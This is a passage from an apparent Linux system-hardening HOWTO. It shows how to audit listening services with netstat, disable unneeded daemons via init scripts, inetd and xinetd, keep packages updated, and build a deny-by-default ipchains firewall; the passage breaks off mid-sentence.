    really need them and there is no good alternative.
-----------------------------------------------------------------------------
3.1. System Audit
So what is really running on our system anyway? Let's not take anything for
granted about what "should" be running, or what we "think" is running.
Unfortunately, there is no such thing as a standard Linux installation. The
wide variety of servers available, coupled with each particular
distribution's installation options, make providing a ready made list
impossible. The best that can be done is show you how to list all running
services, and point you in the right general direction.
Now open an xterm, and su to root. You'll need to widen the window so
the lines do not wrap. Use this command: netstat -tap |grep LISTEN. This will
give us a list of all currently running servers as indicated by the keyword
LISTEN, along with the "PID" and "Program Name" that started each particular
service.
+----------------------------------------------------------------------------------+
|# netstat -tap |grep LISTEN |
| *:exec *:* LISTEN 988/inetd |
| *:login *:* LISTEN 988/inetd |
| *:shell *:* LISTEN 988/inetd |
| *:printer *:* LISTEN 988/inetd |
| *:time *:* LISTEN 988/inetd |
| *:x11 *:* LISTEN 1462/X |
| *:http *:* LISTEN 1078/httpd |
| bigcat:domain *:* LISTEN 956/named |
| bigcat:domain *:* LISTEN 956/named |
| *:ssh *:* LISTEN 972/sshd |
| *:auth *:* LISTEN 388/in.identd |
| *:telnet *:* LISTEN 988/inetd |
| *:finger *:* LISTEN 988/inetd |
| *:sunrpc *:* LISTEN 1290/portmap |
| *:ftp *:* LISTEN 988/inetd |
| *:smtp *:* LISTEN 1738/sendmail: accepting connections |
| *:1694 *:* LISTEN 1319/rpc.mountd |
| *:netbios-ssn *:* LISTEN 422/smbd |
| |
| |
+----------------------------------------------------------------------------------+
Note the first three columns are cropped above for readability. If your list
is as long as the example, you have some work ahead of you! It is highly
unlikely that you really need anywhere near this number of servers running.
Please be aware that the example above is just one of many, many possible
system configurations. Yours probably does look very different.
You don't understand what any of this is telling you? Hopefully then, you've
read the netstat tutorial in the Appendix, and understand how it works.
Understanding exactly what each server is in the above example, and what it
does, is beyond the scope of this document. You will have to check your
system's documentation (e.g. Installation Guide, man pages, etc) if that
service is important to you. For example, does "exec", "login", and "shell"
sound important? Yes, but these are not what they may sound like. They are
actually rexec, rlogin, and rsh, the "r" (for remote) commands. These are
antiquated, unnecessary, and in fact, are very dangerous if exposed to the
Internet.
Let's make a few quick assumptions about what is necessary and unnecessary,
and therefore what goes and what stays on bigcat. Since we are running a
desktop on bigcat, X11 of course needs to stay. If bigcat were a dedicated
server of some kind, then X11 would be unnecessary. If there is a printer
physically attached, the printer (lp) daemon should stay. Otherwise, it goes.
Print servers may sound harmless, but are potential targets too since they
can hold ports open. If we plan on logging in to bigcat from other hosts,
sshd (Secure SHell Daemon) would be necessary. If we have Microsoft hosts on
our LAN, we probably want Samba, so smbd should stay. Otherwise, it is
completely unnecessary. Everything else in this example is optional and not
required for a normally functioning system, and should probably go. See
anything that you don't recognize? Not sure about? It goes!
To sum up: since bigcat is a desktop with a printer attached, we will need
"x11" and "printer". bigcat is on a LAN with MS hosts, and shares files and
printing with them, so "netbios-ssn" (smbd) is desired. We will also need
"ssh" so we can login from other machines. Everything else is unnecessary for
this particular case.
Nervous about this? If you want, you can make notes of any changes you make
or save the list of servers you got from netstat, with this command: netstat
-tap |grep LISTEN > ~/services.lst. That will save it to your home directory
with the name of "services.lst" for future reference.
This is not to say that the ones we have decided to keep are inherently safe.
Just that we probably need these. So we will have to deal with these via
firewalling or other means (addressed below).
It is worth noting that the telnet and ftp daemons in the above example are
servers, aka "listeners". These accept incoming connections to you. You do
not need, or want, these just to use ftp or telnet clients. For instance, you
can download files from an FTP site with just an ftp client. Running an ftp
server on your end is not required at all, and has serious security
implications.
There may be individual situations where it is desirable to make exceptions
to the conclusions reached above. See below.
-----------------------------------------------------------------------------
3.2. The Danger Zone (or r00t m3 pl34s3)
The following is a list of services that should not be run over the Internet.
Either disable these (see below), uninstall, or if you really do need these
services running locally, make sure they are the current, patched versions
and that they are effectively firewalled. And if you don't have a firewall in
place now, turn them off until it is up and verified to be working properly.
These are potentially insecure by their very nature, and as such are prime
cracker targets.
  * NFS (Network File System) and related services, including nfsd, lockd,
    mountd, statd, portmapper, etc. NFS is the standard Unix service for
    sharing file systems across a network. Great system for LAN usage, but
    dangerous over the Internet. And it's completely unnecessary on a
    stand-alone system.
  * rpc.* services, Remote Procedure Call.*, typically NFS and NIS related
    (see above).
  * Printer services (lpd).
  * The so-called r* (for "remote", i.e. Remote SHell) services: rsh, rlogin,
    rexec, rcp, etc. Unnecessary, insecure and potentially dangerous, and
    better utilities are available if these capabilities are needed. ssh will
    do everything these commands do, and in a much more sane way. See the man
    pages for each if curious. These will probably show in netstat output
    without the "r": rlogin will be just "login", etc.
  * telnet server. There is no reason for this anymore. Use sshd instead.
  * ftp server. There are better, safer ways for most systems to exchange
    files, like scp or via http (see below). ftp is a proper protocol only
    for someone who is running a dedicated ftp server, and who has the time
    and skill to keep it buttoned down. For everyone else, it is potentially
    big trouble.
  * BIND (named), DNS server package. With some work, this can be done
    without great risk, but it is not necessary in many situations, and
    requires special handling no matter how you do it. See the sections on
    Exceptions and special handling for individual applications.
  * Mail Transport Agent, aka "MTA" (sendmail, exim, postfix, qmail). Most
    installations on single computers will not really need this. If you are
    not going to be directly receiving mail from Internet hosts (as a
    designated MX box), but will rather use the POP server of your ISP, then
    it is not needed. You may however need this if you are receiving mail
    directly from other hosts on your LAN, but initially it's safer to
    disable this. Later, you can enable it over the local interface once your
    firewall and access policies have been implemented.
This is not necessarily a definitive list. Just some common services that are
sometimes started on default Linux installations. And conversely, this does
not imply that other services are inherently safe.
-----------------------------------------------------------------------------
3.3. Stopping Services
The next step is to find where each server on our kill list is being started.
If it is not obvious from the netstat output, use ps, find, grep or locate to
find more information from the "Program name" or "PID" info in the last
column. There are examples of this in the Process Owner section in the netstat
Tutorial of the Appendix. If the service name or port number does not look
familiar to you, you might get a real brief explanation in your /etc/services
file.
Worried that we are going to break your system, and that the pieces won't go
back together again? If so, take this approach: turn off everything listed
above in "The Danger Zone", and run your system for a while. All well? Then
try stopping one of the services we found to be "unnecessary" above, and run
the system for a while. Keep repeating this process until you get to the bare
minimum. If this works, then make the changes permanent (see below).
The ultimate objective is not just to stop the service now, but to make sure
it is stopped permanently! So whatever steps you take here, be sure to check
after your next reboot.
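One way to verify this is to save a baseline of listening services now, then
compare it with a fresh snapshot after the next reboot. A minimal sketch,
using hypothetical snapshot contents for illustration; on a real system each
file would be produced with netstat -tap | grep LISTEN, as with the
~/services.lst file suggested earlier:

```shell
# Hypothetical before/after snapshots, trimmed to the local-address column.
# On a real system each file would come from: netstat -tap | grep LISTEN > file
printf '*:ssh\n*:x11\n'           > /tmp/services.before
printf '*:ssh\n*:x11\n*:telnet\n' > /tmp/services.after

# diff prints any listener that has crept back in since the baseline:
if diff /tmp/services.before /tmp/services.after; then
    echo "No change in listening services"
else
    echo "A new listener appeared -- investigate!"
fi
```

Here the stray telnet line would show up in the diff output, flagging a
service that was re-enabled behind your back.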
There are various places and ways to start system services. Let's look at the
most common ways this is done, and is probably how your system works. System
services are typically either started by "init" scripts, or by inetd (or its
replacement xinetd) on most distributions. (The location of the init scripts
may vary from distribution to distribution.)
-----------------------------------------------------------------------------
3.3.1. Stopping Init Services
Init services are typically started automatically during the boot process, or
during a runlevel change. There is a naming scheme that uses symlinks to
determine which services are to be started, or stopped, at any given
runlevel. The scripts themselves should be in /etc/init.d/ (or possibly /etc/
rc.d/init.d/ ). This init style is used by Red Hat, SuSE, Mandrake, Debian,
Conectiva, and most Linuxes. Slackware is one notable exception (though
recent versions have an option for this)! Typically on Slackware, system
services are all configured in one file: /etc/rc.d/rc.inet2.
You can get a listing of these scripts:
+---------------------------------------------------------------------------+
| # ls -l /etc/init.d/ | less |
| |
| |
+---------------------------------------------------------------------------+
Or use whichever tools your distribution provides for this.
To stop a running service now, as root (on SysVinit style systems, which is
pretty much everybody):
+---------------------------------------------------------------------------+
| # /etc/init.d/<$SERVICE_NAME> stop |
| |
| |
+---------------------------------------------------------------------------+
Where "$SERVICE_NAME" is the name of the init script, which is often, but not
always, the same as the service name itself. This should do the trick on most
distributions. Older Red Hat versions may use the path /etc/rc.d/init.d/
instead.
This only stops this particular service now. It will restart again on the
next reboot, or runlevel change, unless additional steps are taken. So this
is really a two step process for init type services.
Your distribution will have utilities available for controlling which
services are started at various runlevels. Debian based systems have
update-rc.d for this, and Red Hat based systems have chkconfig. If you are
familiar with these tools, do it now, and then check again after the next
reboot. If you are not familiar with these tools, see the man pages and learn
it now! This is something that you need to know. For Debian (where
$SERVICE_NAME is the init script name):
+---------------------------------------------------------------------------+
| |
| # update-rc.d -f $SERVICE_NAME remove |
| |
| |
+---------------------------------------------------------------------------+
And Red Hat:
+---------------------------------------------------------------------------+
| |
| # chkconfig $SERVICE_NAME off |
| |
| |
+---------------------------------------------------------------------------+
Another option here is to uninstall a package if you know you do not need it.
This is a pretty sure-fire, permanent fix. This also alleviates the potential
problem of keeping all installed packages updated and current (Step 2). And,
package management systems like RPM or DEB make it very easy to re-install a
package should you change your mind.
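As a sketch of that route (the package name "wu-ftpd" and the daemon path
here are hypothetical examples; substitute whatever netstat turned up, and
run the removals as root):

```shell
# Which package owns the daemon netstat showed us? (read-only queries)
#   rpm  -qf /usr/sbin/in.ftpd    # RPM-based (Red Hat, SuSE, Mandrake, ...)
#   dpkg -S  /usr/sbin/in.ftpd    # Debian-based
#
# Remove that package (easy to re-install later if you change your mind):
#   rpm  -e  wu-ftpd              # RPM-based
#   apt-get remove wu-ftpd        # Debian-based
```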
-----------------------------------------------------------------------------
3.3.2. Inetd
Inetd is called a "super-daemon" because it is used to spawn sub-daemons.
inetd itself will generally be started via init scripts, and will "listen" on
the various ports as determined by which services are enabled in its
configuration file, /etc/inetd.conf. Any service listed here will be under
the control of inetd. Likewise, any of the listening servers in netstat
output that list "inetd" in the last column under "Program Name", will have
been started by inetd. You will have to adjust the inetd configuration to
stop these services. xinetd is an enhanced inetd replacement, and is
configured differently (see next section below).
Below is a partial snippet from a typical inetd.conf. Any service with a "#"
at the beginning of the line is "commented out", and thus ignored by inetd,
and consequently disabled.
+---------------------------------------------------------------------------+
|# |
|# inetd.conf This file describes the services that will be available |
|# through the INETD TCP/IP super server. To re-configure |
|# the running INETD process, edit this file, then send the |
|# INETD process a SIGHUP signal. |
|# |
|# Version: @(#)/etc/inetd.conf 3.10 05/27/93 |
|# |
|# Authors: Original taken from BSD UNIX 4.3/TAHOE. |
|# Fred N. van Kempen, <waltje@uwalt.nl.mugnet.org> |
|# |
|# Modified for Debian Linux by Ian A. Murdock <imurdock@shell.portal.com> |
|# |
|# Echo, discard, daytime, and chargen are used primarily for testing. |
|# |
|# To re-read this file after changes, just do a 'killall -HUP inetd' |
|# |
|#echo stream tcp nowait root internal |
|#echo dgram udp wait root internal |
|#discard stream tcp nowait root internal |
|#discard dgram udp wait root internal |
|#daytime stream tcp nowait root internal |
|#daytime dgram udp wait root internal |
|#chargen stream tcp nowait root internal |
|#chargen dgram udp wait root internal |
|time stream tcp nowait root internal |
|# |
|# These are standard services. |
|# |
|#ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a |
|#telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd |
|# |
|# Shell, login, exec, comsat and talk are BSD protocols. |
|# |
|#shell stream tcp nowait root /usr/sbin/tcpd in.rshd |
|#login stream tcp nowait root /usr/sbin/tcpd in.rlogind |
|#exec stream tcp nowait root /usr/sbin/tcpd in.rexecd |
|#comsat dgram udp wait root /usr/sbin/tcpd in.comsat |
|#talk dgram udp wait root /usr/sbin/tcpd in.talkd |
|#ntalk dgram udp wait root /usr/sbin/tcpd in.ntalkd |
|#dtalk stream tcp wait nobody /usr/sbin/tcpd in.dtalkd |
|# |
|# Pop and imap mail services et al |
|# |
|#pop-2 stream tcp nowait root /usr/sbin/tcpd ipop2d |
|pop-3 stream tcp nowait root /usr/sbin/tcpd ipop3d |
|#imap stream tcp nowait root /usr/sbin/tcpd imapd |
|# |
|# The Internet UUCP service. |
|# |
|#uucp stream tcp nowait uucp /usr/sbin/tcpd /usr/lib/uucp/uucico -l |
|# |
| |
|<snip> |
| |
| |
+---------------------------------------------------------------------------+
The above example has two services enabled: time and pop3. To disable these,
all we need is to open the file with a text editor, comment out the two
services with a "#", save the file, and then restart inetd (as root):
+---------------------------------------------------------------------------+
| # /etc/init.d/inetd restart |
| |
| |
| |
+---------------------------------------------------------------------------+
Check your logs for errors, and run netstat again to verify all went well.
A quicker way of getting the same information, using grep:
+---------------------------------------------------------------------------+
| $ grep -v '^#' /etc/inetd.conf |
| time stream tcp nowait root internal |
| pop-3 stream tcp nowait root /usr/sbin/tcpd ipop3d |
| |
| |
+---------------------------------------------------------------------------+
Again, do you see anything there that you don't recognize? Then in all
likelihood you are not using it, and it should be disabled.
Unlike the init services configuration, this is a lasting change so only the
one step is required.
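The commenting-out step itself can be scripted with sed. A minimal sketch,
run here against a scratch copy containing the two enabled entries from the
example, so nothing real is touched until you are satisfied with the result:

```shell
# Build a scratch copy with the two enabled services from the example above.
printf 'time\tstream\ttcp\tnowait\troot\tinternal\n' >  /tmp/inetd.conf.test
printf 'pop-3\tstream\ttcp\tnowait\troot\t/usr/sbin/tcpd\tipop3d\n' >> /tmp/inetd.conf.test

# Comment out both services by prepending "#" to their lines.
sed -i 's/^\(time\|pop-3\)/#&/' /tmp/inetd.conf.test

# Nothing left enabled:
grep -v '^#' /tmp/inetd.conf.test || echo "all services commented out"
```

On the real system, you would make the same edit to /etc/inetd.conf (after
backing it up), and then restart inetd as shown above.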
Let's expose one myth that gets tossed around: you shouldn't disable a
service by commenting out, or removing, entries from /etc/services. This may
have the desired effect in some cases, but is not the right way to do it, and
may interfere with the normal operation of other system utilities.
-----------------------------------------------------------------------------
3.3.3. Xinetd
xinetd is an inetd replacement with enhancements. It essentially serves the
same purpose as inetd, but the configuration is different. The configuration
can be in the file /etc/xinetd.conf, or individual files in the directory /
etc/xinetd.d/. Turning off xinetd services is done by either deleting the
corresponding configuration section, or file. Or by using your text editor
and simply setting disable = yes for the appropriate service. Then, xinetd
will need to be restarted. See man xinetd and man xinetd.conf for syntax and
configuration options. A sample xinetd configuration:
+---------------------------------------------------------------------------+
| # default: on |
| # description: The wu-ftpd FTP server serves FTP connections. It uses \ |
| # normal, unencrypted usernames and passwords for authentication. |
| service ftp |
| { |
| disable = no |
| socket_type = stream |
| wait = no |
| user = root |
| server = /usr/sbin/in.ftpd |
| server_args = -l -a |
| log_on_success += DURATION USERID |
| log_on_failure += USERID |
| nice = 10 |
| } |
| |
| |
+---------------------------------------------------------------------------+
You can get a quick list of enabled services:
+---------------------------------------------------------------------------+
| $ grep disable /etc/xinetd.d/* |grep no |
| /etc/xinetd.d/finger: disable = no |
| /etc/xinetd.d/rexec: disable = no |
| /etc/xinetd.d/rlogin: disable = no |
| /etc/xinetd.d/rsh: disable = no |
| /etc/xinetd.d/telnet: disable = no |
| /etc/xinetd.d/wu-ftpd: disable = no |
| |
| |
+---------------------------------------------------------------------------+
At this point, the above output should raise some red flags. In the
overwhelming majority of systems, all the above can be disabled without any
adverse impact. Not sure? Try it without that service. After disabling
unnecessary services, then restart xinetd:
+---------------------------------------------------------------------------+
| # /etc/init.d/xinetd restart |
| |
| |
| |
+---------------------------------------------------------------------------+
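This too can be scripted. A minimal sketch against a scratch copy of a
service stanza (modeled on the ftp example above), so you can check the
result before editing the real files under /etc/xinetd.d/:

```shell
# Scratch copy of a xinetd service stanza with the service enabled.
printf 'service ftp\n{\n\tdisable = no\n\tsocket_type = stream\n}\n' > /tmp/xinetd-ftp.test

# Flip "disable = no" to "disable = yes" to turn the service off.
sed -i 's/disable[[:space:]]*=[[:space:]]*no/disable = yes/' /tmp/xinetd-ftp.test

grep disable /tmp/xinetd-ftp.test   # now shows: disable = yes
```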
-----------------------------------------------------------------------------
3.3.4. When All Else Fails
OK, if you can't find the "right" way to stop a service, or maybe a service
is being started and you can't find how or where, you can "kill" the process.
To do this, you will need to know the PID (Process I.D.). This can be found
with ps, top, fuser or other system utilities. For top and ps, this will be
the number in the first column. See the Port and Process Owner section in the
Appendix for examples.
Example (as root):
+---------------------------------------------------------------------------+
| # kill 1163 |
| |
| |
+---------------------------------------------------------------------------+
Then run top or ps again to verify that the process is gone. If not, then:
+---------------------------------------------------------------------------+
| # kill -KILL 1163 |
| |
| |
+---------------------------------------------------------------------------+
Note the second "KILL" in there. This must be done either by the user who
owns the process, or root. Now go find where and how this process got started
;-)
The /proc filesystem can also be used to find out more information about each
process. Armed with the PID, we can find the path to a mysterious process:
+---------------------------------------------------------------------------+
| $ /bin/ps ax|grep tcpgate |
| 921 ? S 0:00 tcpgate |
| |
| |
+---------------------------------------------------------------------------+
+----------------------------------------------------------------------------------+
| # ls -l /proc/921/exe |
| lrwxrwxrwx 1 root root 0 July 21 12:11 /proc/921/exe -> /usr/local/bin/tcpgate |
| |
| |
+----------------------------------------------------------------------------------+
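fuser, mentioned above, can also work in the other direction, naming the
process that owns a given port. A sketch (run as root; port 515, the printer
port, is just an example):

```shell
# Which process is listening on TCP port 515 (the lp/printer port)?
#   fuser -v -n tcp 515
# The -v output lists the user, PID, and command name for that port.
```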
-----------------------------------------------------------------------------
3.4. Exceptions
Above we used the criteria of turning off all unnecessary services. Sometimes
that is not so obvious. And sometimes what may be required for one person's
configuration is not the same for another's. Let's look at a few common
services that fall in this category.
Again, our rule of thumb is if we don't need it, we won't run it. It's that
simple. If we do need any of these, they are prime candidates for some kind
of restrictive policies via firewall rules or other mechanisms (see below).
  * identd - This is a protocol that has been around for ages, and is often
    installed and running by default. It is used to provide a minimal amount
    of information about who is connecting to a server. But, it is not
    necessary in many cases. Where might you need it? Most IRC servers
    require it. Many mail servers use it, but don't really require it. Try
    your mail setup without it. If identd is going to be a problem, it will
    be because there is a time out before the server starts sending or
    receiving mail. So mail should work fine without it, but may be slower. A
    few ftp servers may require it. Most don't though.
If identd is required, there are some configuration options that can
greatly reduce the information that is revealed:
+---------------------------------------------------------------+
| |
| /usr/sbin/in.identd in.identd -l -e -o -n -N |
| |
| |
+---------------------------------------------------------------+
    The -o flag tells identd not to reveal the operating system type it is
    run on, and to instead always return "OTHER". The -e flag tells identd to
    always return "UNKNOWN-ERROR" instead of the "NO-USER" or "INVALID-PORT"
    errors. The -n flag tells identd to always return user numbers instead of
    user names, if you wish to keep the user names a secret. The -N flag
    makes identd check for the file .noident in the home directory of the
    user for which the daemon is about to return a user name. If that file
    exists, then the daemon will give the error "HIDDEN-USER" instead of the
    normal "USERID" response.
  * Mail server (MTAs like sendmail, qmail, etc.) - Often a fully functional
    mail server like sendmail is installed by default. The only time that
    this is actually required is if you are hosting a domain, and receiving
    incoming mail directly. Or possibly, for exchanging mail on a LAN, in
    which case it does not need Internet exposure and can be safely
    firewalled. For your ISP's POP mail access, you don't need it, even
    though this is a common configuration. One alternative here is to use
    fetchmail for POP mail retrieval with the -m option to specify a local
    delivery agent: fetchmail -m procmail, for instance, works with no
    sendmail daemon running at all. Sendmail can be handy to have running,
    but the point is, it is not required in many situations, and can be
    disabled, or firewalled safely.
  * BIND (named) - This often is installed by default, but is only really
    needed if you are an authoritative name server for a domain. If you are
    not sure what this means, then you definitely don't need it. BIND is
    probably the number one crack target on the Internet. BIND is often
    used, though, in a "caching only" mode. This can be quite useful, but
    does not require full exposure to the Internet. In other words, it
    should be restricted or firewalled. See special handling of individual
    applications below.
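For the fetchmail alternative mentioned in the mail server item above, the
same thing can be set up permanently in ~/.fetchmailrc. A sketch; the host
and user names are placeholders, not real values:

```shell
# Hypothetical ~/.fetchmailrc: pull POP3 mail and hand it straight to
# procmail, so no MTA daemon needs to listen on port 25 at all.
#   poll pop.example-isp.net proto pop3
#       user "jdoe" pass "secret"
#       mda "/usr/bin/procmail -d %T"
# Then lock it down, since it holds a password:  chmod 600 ~/.fetchmailrc
```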
-----------------------------------------------------------------------------
3.5. Summary and Conclusions for Step 1
In this section we learned how to identify which services are running on our
system, and were given some tips on how to determine which services may be
necessary. Then we learned how to find where the services were being started,
and how to stop them. If this has not made sense, now is a good time to
re-read the above.
Hopefully you've already taken the above steps. Be sure to test your results
with netstat again, just to verify the desired end has been achieved, and
only the services that are really required are running.
It would also be wise to do this after the next reboot, anytime you upgrade a
package (to make sure a new configuration does not sneak in), and after every
system upgrade or new install.
-----------------------------------------------------------------------------
4. Step 2: Updating
OK, this section should be comparatively short, simple and straightforward
compared to the above, but no less important.
The very first thing you should do after a new install is check your
distribution's updates and security notices, and apply all patches. Only a
year old, you say?
That's a long time actually, and not current enough to be safe. Only a few
months or few weeks? Check anyway. A day or two? Better safe than sorry. It
is quite possible that security updates have been released during the
pre-release phase of the development and release cycle. If you can't take
this step, disable any publicly accessible services until you can.
Linux distributions are not static entities. They are updated with new,
patched packages as the need arises. The updates are just as important as the
original installation. Even more so, since they are fixes. Sometimes these
updates are bug fixes, but quite often they are security fixes because some
hole has been discovered. Such "holes" are immediately known to the cracker
community, and crackers are quick to exploit them on a large scale. Once a
hole is known, it is quite simple to get in through it, and there will be many
out there looking for it. Linux developers are equally quick to provide
fixes, sometimes the same day the hole becomes known!
Keeping all installed packages current with your release is one of the most
important steps you can take in maintaining a secure system. It cannot be
emphasized enough that all installed packages should be kept updated -- not
just the ones you use. If this is burdensome, consider uninstalling any
unused packages. Actually, this is a good idea anyway.
But where to get this information in a timely fashion? There are a number of
web sites that offer the latest security news. There are also a number of
mailing lists dedicated to this topic. In fact, your vendor most likely has
such a list where vulnerabilities and the corresponding fixes are announced.
This is an excellent way to stay abreast of issues affecting your release,
and is highly recommended. [http://linuxsecurity.com] http://
linuxsecurity.com is a good site for Linux-only issues. They also have weekly
newsletters available: [http://www.linuxsecurity.com/general/newsletter.html]
http://www.linuxsecurity.com/general/newsletter.html.
Also, many distributions have utilities that will automatically update your
installed packages via ftp. This can be run as a cron job on a regular basis
and is a painless way to go if you have ready Internet access.
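As a minimal sketch of such automation (assuming a Debian-style system with
apt; substitute your distribution's own update tool, and note that the script
path shown is hypothetical):

```shell
#!/bin/sh
# /etc/cron.daily/update-check (hypothetical) -- nightly update check.
# Refresh the package lists quietly, then mail root a dry-run summary
# of pending upgrades. Nothing is installed automatically here.
apt-get update -qq
apt-get -s upgrade | mail -s "Pending updates on `hostname`" root
```

Whether to go further and install updates unattended is a judgment call; a
dry-run report like this at least tells you what is pending, so you can
review before applying.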
This is not a one-time process -- it is ongoing. It is important to stay
current. So watch those security notices. And subscribe to your vendor's
security mailing list today! If you have a cable modem, DSL, or other
full-time connection, there is no excuse not to do this religiously. All
distributions make this easy enough!
One last note: any time a new package is installed, there is also a chance
that a new or revised configuration has been installed as well. This means
that if the package is a server of some kind, it may be enabled as a result
of the update. This is bad manners, but it can happen, so be sure to run
netstat or a comparable tool to verify your system is where you want it after
any updates or system changes. In fact, do it periodically even if there are
no such changes.
-----------------------------------------------------------------------------
4.1. Summary and Conclusions for Step 2
It is very simple: make sure your Linux installation is current. Check with
your vendor for what updated packages may be available. There is nothing
wrong with running an older release, as long as the packages in it are
updated according to what your vendor has made available since the initial
release, and as long as your vendor is still supporting the release and
providing updates.
-----------------------------------------------------------------------------
5. Step 3: Firewalls and Setting Access Policies
So what is a "firewall"? It's a vague term that can mean anything that acts
as a protective barrier between us and the outside world. This can be a
dedicated system, or a specific application that provides this functionality.
Or it can be a combination of components, including various combinations of
hardware and software. Firewalls are built from "rules" that are used to
define what is allowed to enter and exit a given system or network. Let's
look at some of the possible components that are readily available for Linux,
and how we might implement a reasonably safe firewalling strategy.
In Step 1 above, we turned off all services we don't need. In our example,
there were a few we still needed to have running. In this section, we will
take the next step and decide which of these we need to leave open to the
world, and which we might be able to restrict in some way. If we can block
them all, so much the better, but this is not always practical.
-----------------------------------------------------------------------------
5.1. Strategy
What we want to do now is restrict connections and traffic so that we only
allow the minimum necessary for whatever our particular situation is. In some
cases we may want to block all incoming "new" connection attempts. Example:
we want to run X, but don't want anyone from outside to access it, so we'll
block it completely from outside connections. In other situations, we may
want to limit, or restrict, incoming connections to trusted sources only. The
more restrictive, the better. Example: we want to ssh into our system from
outside, but we only ever do this from our workplace. So we'll limit sshd
connections to our workplace address range. There are various ways to do
this, and we'll look at the most common ones.
We also will not want to limit our firewall to any one application. There is
nothing wrong with a "layered" defense-in-depth approach. Our front line
protection will be a packet filter -- either ipchains or iptables (see
below). Then we can use additional tools and mechanisms to reinforce our
firewall.
We will include some brief examples. Our rule of thumb will be to deny
everything as the default policy, then open up just what we need. We'll try
to keep this as simple as possible since it can be an involved and complex
topic, and just stick to some of the most basic concepts. See the Links
section for further reading on this topic.
-----------------------------------------------------------------------------
5.2. Packet Filters -- Ipchains and Iptables
"Packet filters" (like ipchains) have the ability to look at individual
packets, and make decisions based on what they find. These can be used for
many purposes. One common purpose is to implement a firewall.
Common packet filters on Linux are ipchains which is standard with 2.2
kernels, and iptables which is available with the more recent 2.4 kernels.
iptables has more advanced packet filtering capabilities and is recommended
for anyone running a 2.4 kernel. But either can be effective for our
purposes. ipfwadm is a similar utility for 2.0 kernels (not discussed here).
If constructing your own ipchains or iptables firewall rules seems a bit
daunting, there are various sites that can automate the process. See the
Links section. Also the included examples may be used as a starting point.
Your distribution may also include a utility of some kind for generating
a firewall script. This may be adequate, but it is still recommended to know
the proper syntax and how the various mechanisms work, as such tools rarely
do more than a few very simple rules.
Note Various examples are given below. These are presented for illustrative
purposes to demonstrate some of the concepts being discussed here. While
they might also be useful as a starting point for your own script,
please note that they are not meant to be all encompassing. You are
strongly encouraged to understand how the scripts work, so you can
create something even more tailored for your own situation.
The example scripts are just protecting inbound connections to one
interface (the one connected to the Internet). This may be adequate for
many simple home type situations, but, conversely, this approach is not
adequate for all situations!
-----------------------------------------------------------------------------
5.2.1. ipchains
ipchains can be used with either 2.2 or 2.4 kernels. When ipchains is in
place, it checks every packet that moves through the system. The packets move
across different "chains", depending where they originate and where they are
going. Think of "chains" as rule sets. In advanced configurations, we could
define our own custom chains. The three default built-in chains are input,
which is incoming traffic, output, which is outgoing traffic, and forward,
which is traffic being forwarded from one interface to another (typically
used for "masquerading"). Chains can be manipulated in various ways to
control the flow of traffic in and out of our system. Rules can be added at
our discretion to achieve the desired result.
At the end of every "chain" is a "target". The target is specified with the
-j option to the command. The target is what decides the fate of the packet
and essentially terminates that particular chain. The most common targets are
mostly self-explanatory: ACCEPT, DENY, REJECT, and MASQ. MASQ is for
"ipmasquerading". DENY and REJECT essentially do the same thing, though in
different ways. Is one better than the other? That is the subject of much
debate, and depends on other factors that are beyond the scope of this
document. For our purposes, either should suffice.
ipchains has a very flexible configuration. Ports (or port ranges),
interfaces, destination addresses, and source addresses can be specified, as
well as various other options. The man page explains these details well
enough that we won't get into specifics here.
Traffic entering our system from the Internet enters via the input chain.
This is the chain that we need to make as tight as we can.
Below is a brief example script for a hypothetical system. We'll let the
comments explain what this script does. Anything starting with a "#" is a
comment. ipchains rules are generally incorporated into shell scripts, using
shell variables to help implement the firewalling logic.
#!/bin/sh
#
# ipchains.sh
#
# An example of a simple ipchains configuration.
#
# This script allows ALL outbound traffic, and denies
# ALL inbound connection attempts from the outside.
#
###################################################################
# Begin variable declarations and user configuration options ######
#
IPCHAINS=/sbin/ipchains
# This is the WAN interface, that is our link to the outside world.
# For pppd and pppoe users.
# WAN_IFACE="ppp0"
WAN_IFACE="eth0"
## end user configuration options #################################
###################################################################
# The high ports used mostly for connections we initiate and return
# traffic.
LOCAL_PORTS=`cat /proc/sys/net/ipv4/ip_local_port_range |cut -f1`:\
`cat /proc/sys/net/ipv4/ip_local_port_range |cut -f2`
# Any and all addresses from anywhere.
ANYWHERE="0/0"
# Let's start clean and flush all chains to an empty state.
$IPCHAINS -F
# Set the default policies of the built-in chains. If no match for any
# of the rules below, these will be the defaults that ipchains uses.
$IPCHAINS -P forward DENY
$IPCHAINS -P output ACCEPT
$IPCHAINS -P input DENY
# Accept localhost/loopback traffic.
$IPCHAINS -A input -i lo -j ACCEPT
# Get our dynamic IP now from the Inet interface. WAN_IP will be our
# IP address we are protecting from the outside world. Put this
# here, so default policy gets set, even if interface is not up
# yet.
WAN_IP=`ifconfig $WAN_IFACE |grep inet |cut -d : -f 2 |cut -d \ -f 1`
# Bail out with error message if no IP available! Default policy is
# already set, so all is not lost here.
[ -z "$WAN_IP" ] && echo "$WAN_IFACE not configured, aborting." && exit 1
# Accept non-SYN TCP, and UDP connections to LOCAL_PORTS. These are
# the high, unprivileged ports (1024 to 4999 by default). This will
# allow return connection traffic for connections that we initiate
# to outside sources. TCP connections are opened with 'SYN' packets.
$IPCHAINS -A input -p tcp -s $ANYWHERE -d $WAN_IP $LOCAL_PORTS ! -y -j ACCEPT
# We can't be so selective with UDP since that protocol does not
# know about SYNs.
$IPCHAINS -A input -p udp -s $ANYWHERE -d $WAN_IP $LOCAL_PORTS -j ACCEPT
## ICMP (ping)
#
# ICMP rules, allow the bare essential types of ICMP only. Ping
# request is blocked, ie we won't respond to someone else's pings,
# but can still ping out.
$IPCHAINS -A input -p icmp --icmp-type echo-reply \
-s $ANYWHERE -i $WAN_IFACE -j ACCEPT
$IPCHAINS -A input -p icmp --icmp-type destination-unreachable \
-s $ANYWHERE -i $WAN_IFACE -j ACCEPT
$IPCHAINS -A input -p icmp --icmp-type time-exceeded \
-s $ANYWHERE -i $WAN_IFACE -j ACCEPT
###################################################################
# Set the catchall, default rule to DENY, and log it all. All other
# traffic not allowed by the rules above, winds up here, where it is
# blocked and logged. This is the default policy for this chain
# anyway, so we are just adding the logging ability here with '-l'.
# Outgoing traffic is allowed as the default policy for the 'output'
# chain. There are no restrictions on that.
$IPCHAINS -A input -l -j DENY
echo "Ipchains firewall is up `date`."
##-- eof ipchains.sh
To use the above script, it must be made executable (i.e. chmod +x
ipchains.sh), and run by root to build the chains, and hence the firewall.
To summarize, this example starts by setting some shell variables in the top
